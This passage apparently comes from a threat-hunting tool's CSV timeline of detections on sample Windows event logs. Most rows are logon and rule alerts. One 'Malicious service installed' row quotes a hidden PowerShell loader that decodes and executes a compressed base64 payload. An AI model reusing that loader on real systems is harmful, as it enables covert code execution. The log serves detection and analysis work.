memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 
+09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 
+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant 
Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 